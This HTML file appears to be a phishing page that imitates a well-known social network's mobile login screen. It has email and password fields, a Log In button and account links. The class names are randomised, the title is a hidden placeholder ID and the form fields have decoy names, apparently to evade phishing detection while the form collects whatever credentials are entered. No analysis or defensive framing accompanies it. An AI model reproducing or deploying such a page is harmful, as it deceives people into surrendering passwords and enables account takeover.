<!DOCTYPE html>
<html>

<head><meta http-equiv="Content-Type" content="text/html; charset=gb18030">

	
	<title>ID-AAAASSSSDDDDFFFF</title>

	<meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">

<style type="text/css">

body.tmrrwbbmlndknxln { 
	margin: 0px;
	text-size-adjust: none; 
	cursor: pointer; 
}

.tmrrwbbmlndknxln, .tmrrwbbmlndknxln input { 
	font-family: Helvetica, Arial, sans-serif; 
	font-size: 14px; 
}

.tmrrwbbmlndknxln, .tmrrwbbmlndknxln .dyoxrxbtbenvbyc, .tmrrwbbmlndknxln button, .tmrrwbbmlndknxln input{ 
	-webkit-tap-highlight-color: rgba(0, 0, 0, 0); 
}


body { 
	text-align: left; 
	direction: ltr; 
}

body, input, button { 
	font-family: sans-serif; 
}

body, h1, ul, li{ 
	margin: 0px; 
	padding: 0px; 
}

h1{ 
	font-size: 1em; 
	font-weight: bold; 
}

ul{ 
	list-style: none; 
}


.tmrrwbbmlndknxln .jtgluhbqiposqhxr .bnutomwjwoaxilg { 
	text-align: center; 
}

.tmrrwbbmlndknxln .srxztniicbykyqo { 
	padding: 6px; 
}

.xhczwsdmgrbktrtfa { 
	background: rgb(117, 150, 0); 
	box-sizing: border-box; 
	height: 44px; 
	margin: 0px auto; 
	padding: 7px 0px; 
	position: relative; 
	width: 100%; 
	z-index: 12; 
	align-items: center;
}

.tmrrwbbmlndknxln .ufrjflirddffxwmr { 
	display: flex; 
}

.lczvafhslbkwoxpbp { 
	min-width: 160px; 
	text-align: center; 
	flex: 1 1 0%; 
	width: 0px;
}


.tmrrwbbmlndknxln .hdpqszcgotkomtirl { 
	flex: 1 1 0%; 
	width: 0px; 
}

.tmrrwbbmlndknxln .hdpqszcgotkomtirl .vnfuwkpkvdsyagyhl { 
	flex: 1 1 0%; 
	width: 100%; 
}

.vnfuwkpkvdsyagyhl { 
	border: 1px solid transparent; 
	margin: -1px; 
	flex: 1 1 0%; 
	width: 0px;
}

.xqikcvomjlxxcjz { margin: 3px 0px; }



.cuizvcaapvboxkat { 
	padding-top: 12px; 
	padding-bottom: 36px; text-align: center;

}

.cuizvcaapvboxkat a { color: rgb(117, 150, 0); font-size: 12px; line-height: 16px; }

.xxaobeugbqttmaxbq { 
	border-color: rgb(216, 223, 234); 
	background-color: rgb(236, 239, 234);
	margin: 0px auto; 
	max-width: 416px;
	padding-bottom: 36px; 
	text-align: center;
	padding: 0px 16px;


}


.tmrrwbbmlndknxln .nahecuwxlkiwhqenw { padding: 12px; }

.ggshqizjeunkoic { 
	border: 0px; 
	display: block; 
	margin: 0px; 
	padding: 0px; 
	-webkit-appearance: none; 
	box-sizing: border-box; 
	width: 100%;
}


.btwpngdaamsmfpjg { 
	padding-bottom: 1px; 
	padding-top: 16px; 
}

.qtixxjxkbkprtvvdg > div > input { 
	border-bottom: 1px solid rgba(0, 0, 0, 0.0980392); 
	border-radius: 0px; 
	line-height: 20px; 
}




.lghntloigtqmkgaor { 
	padding: 12px 0px; 
}

.dtllhhntmlxndmuki { 
	display: block; 
	margin-left: 5%; 
	margin-right: 5%; 
	margin-top: 10px; 
	overflow: hidden; 
	text-align: center; 
	white-space: nowrap; 
	width: 90%; 
}

.dtllhhntmlxndmuki > span { 
	display: inline-block; 
	position: relative; 
}

.dtllhhntmlxndmuki > span::before, .dtllhhntmlxndmuki > span::after { 
	background: rgb(206, 208, 0); 
	content: ""; 
	height: 1px; 
	position: absolute; 
	top: 50%; 
	width: 9999px; 
}

.dtllhhntmlxndmuki > span::before { 
	margin-right: 15px; 
	right: 100%; 
}

.dtllhhntmlxndmuki > span::after { 
	left: 100%;
	margin-left: 15px; 
}

.zrqtrmlcmdboueigq { 
	color: rgb(75, 79, 86); 
}

.tmrrwbbmlndknxln .biynshjayonulii { 
	line-height: 20px; 
}

.biynshjayonulii { 
	box-sizing: border-box; 
	width: 100%; 
}

.dyoxrxbtbenvbyc input { 
	background: none; 
	border: none; 
	margin: 0px; 
	padding: 0px; 
}

.mvubdauumebmtsnw input{ 
	color: rgb(255, 255, 255); 
}

.tmrrwbbmlndknxln .dyoxrxbtbenvbyc { 
	background-clip: padding-box; 
	border: 1px solid; 
	border-radius: 4px; 
	box-sizing: border-box; 
	display: inline-block; 
	font-weight: bold; 
	min-width: 50px; 
	overflow: hidden; 
	padding: 0px 8px; 
	text-overflow: ellipsis; 
	vertical-align: bottom; 
	white-space: nowrap; 
}

html .tmrrwbbmlndknxln .dyoxrxbtbenvbyc { 
	line-height: 27px; 
}


.tmrrwbbmlndknxln .dyoxrxbtbenvbyc.mvubdauumebmtsnw{ 
	color: rgb(255, 255, 255); 
	text-shadow: rgba(0, 0, 0, 0.34902) 0px -1px 0px; 
}


.tmrrwbbmlndknxln .mvubdauumebmtsnw { 
	background: linear-gradient(rgb(117, 171, 75), rgb(74, 133, 50)); 
	border-color: rgb(104, 149, 76) rgb(66, 115, 41) rgb(56, 106, 36); 
}

.nnggbopeqoopecp { 
	color: rgb(144, 148, 156); 
}

.ejtsvqcrfcpnnvq { 
	font-size: 12px; line-height: 16px; 
}

.ljbgadyffnttjka { 
	font-weight: bold; 
}

.odkaphnttidcddtu { 
	text-align: center; 
}

.xqikcvomjlxxcjz { 
	border: 0px; 
	display: inline-block; 
	vertical-align: top; 
}

i.xqikcvomjlxxcjz u { 
	position: absolute; 
	width: 0px; 
	height: 0px; 
	overflow: hidden; 
}

.tmrrwbbmlndknxln a { 
	color: rgb(87, 107, 149); 
	cursor: pointer; 
	text-decoration: none; 
}

.tmrrwbbmlndknxln .bwewqrbrdujrrau { 
	padding: 8px; 
}

.tabcazrnucwcuyhwq { 
	-webkit-appearance: none; 
	background: none; 
	display: inline-block; 
	font-size: 12px; 
	height: 28px; 
	line-height: 28px; 
	margin: 0px; 
	overflow: visible; 
	padding: 0px 9px; 
	text-align: center; 
	vertical-align: top; 
	white-space: nowrap; 
}

.tmrrwbbmlndknxln .tabcazrnucwcuyhwq { 
	border: none; 
	border-radius: 3px; 
	box-sizing: border-box; 
	font-weight: bold; 
	position: relative; 
	user-select: none; 
	z-index: 0; 
}


.tmrrwbbmlndknxln .tabcazrnucwcuyhwq::before{ 
	border-radius: 4px; 
	bottom: -1px; 
	content: ""; 
	left: -1px; 
	pointer-events: none; 
	position: absolute; 
	right: -1px; 
	top: -1px; 
	transform: none; 
	z-index: -1; 
}

.gwapiutawskzsyc, a.gwapiutawskzsyc{ 
	color: rgb(255, 255, 255); 
}

.tmrrwbbmlndknxln .gwapiutawskzsyc, .tmrrwbbmlndknxln a.gwapiutawskzsyc{ 
	text-shadow: rgba(0, 0, 0, 0.247059) 0px -1px; 
}

.tmrrwbbmlndknxln .gwapiutawskzsyc::after{ 
	border-color: rgba(0, 0, 0, 0.14902) rgba(0, 0, 0, 0.14902) rgba(0, 0, 0, 0.258824); 
	box-shadow: rgba(0, 0, 0, 0.137255) 0px 1px 0px, rgba(0, 0, 0, 0.027451) 0px -1px 1px 0px inset; 
}

.tmrrwbbmlndknxln .gwapiutawskzsyc::before{ 
	background-color: rgb(98, 122, 173); 
	background-image: linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.0980392)); 
}


.zerthnwcmeydbro { 
	font-size: 14px; 
	height: 36px; 
	line-height: 36px; 
	padding: 0px 16px; 
}

.tabcazrnucwcuyhwq.tlfohuilterbykczn { 
	display: block; width: 100%; 
}

.kkyrmokfblddbte { 
	position: relative; 
}

.kkyrmokfblddbte::before { 
	border-color: rgba(0, 0, 0, 0.0666667) rgba(0, 0, 0, 0.109804) rgba(0, 0, 0, 0.180392); 
	border-radius: 4px; 
	border-style: solid; 
	border-width: 1px; 
	bottom: -1px; 
	content: ""; 
	left: -1px; 
	pointer-events: none; 
	position: absolute; 
	right: -1px; top: -1px; 
}

.usifxjqbnsurnlkwi { 
	border-radius: 4px; 
	overflow: hidden; 
}

.fzinsuocqdzfepl { 
	background-size: 312px 145px; 
	background-repeat: no-repeat; 
	display: inline-block; 
	height: 16px; 
	width: 16px; 
}

.fzinsuocqdzfepl.ftmipauylsvobuq { 
	width: 103px; height: 21px; 
	background-position: 0px -25px; 
}

.cfbrpxvivwoudzvfh { 
	padding-top: 12px; 
}

</style>

</head>


<body tabindex="0" class="tmrrwbbmlndknxln" style="min-height: 622px; background-color: rgb(255, 255, 255);">

	<div id="viewport" style="min-height: 622px;">
	<h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">ID-AAAASSSSDDDDFFFF</h1>

	<div>
		<div class="ufrjflirddffxwmr xhczwsdmgrbktrtfa">
			<div class="lczvafhslbkwoxpbp">
				<a href="#"><i class="xqikcvomjlxxcjz fzinsuocqdzfepl ftmipauylsvobuq"><u>ID-AAAASSSSDDDDFFFF</u></i></a>
			</div>
		</div>
		<div class="tzumtjojmoordas" style="min-height: 622px;">
			<div class="ufrjflirddffxwmr">
				<div class="hdpqszcgotkomtirl">
					<div>
						<div class="xxaobeugbqttmaxbq">

							<form method="post" class="btwpngdaamsmfpjg" action="">
								<div class="kkyrmokfblddbte qtixxjxkbkprtvvdg">
									<div class="usifxjqbnsurnlkwi">
									<input class="ggshqizjeunkoic nahecuwxlkiwhqenw" name="cangaroo" placeholder="Email or Phone" type="text">
											<div class="ufrjflirddffxwmr">
												<div class="hdpqszcgotkomtirl">
													<div class="vnfuwkpkvdsyagyhl">
														<input class="ggshqizjeunkoic nahecuwxlkiwhqenw biynshjayonulii" name="littlecangaroo" placeholder="Password" type="password">
													</div>
												</div>
											</div>
									</div>
								</div>
								<div class="cfbrpxvivwoudzvfh" style="text-align:center;">
								<button type="submit" value="Log In" class="tabcazrnucwcuyhwq tlfohuilterbykczn zerthnwcmeydbro gwapiutawskzsyc" name="login">
									Log In
								</button>
								</div>
							</form>

								<div class="dtllhhntmlxndmuki">
									<span class="zrqtrmlcmdboueigq">or</span>
								</div>
								<div class="odkaphnttidcddtu lghntloigtqmkgaor">
									<a class="dyoxrxbtbenvbyc mvubdauumebmtsnw" style="height:36px; padding-left:16px; padding-right:16px; padding-top:5px;" href="#">
										Create New Account
									</a>
								</div>
								<div>
									<div class="cuizvcaapvboxkat">
										<ul>
											<li>
													<a href="#">Forgot Password?</a>
													 · 
													<a href="#" >Help Center</a>
											</li>
										</ul>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="bwewqrbrdujrrau jtgluhbqiposqhxr">
					<div class="bnutomwjwoaxilg">
						<div class="srxztniicbykyqo">
							<div class="ufrjflirddffxwmr">
								<div class="hdpqszcgotkomtirl">
									<span class="ejtsvqcrfcpnnvq nnggbopeqoopecp ljbgadyffnttjka">English (US)</span>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
</body>
</html>
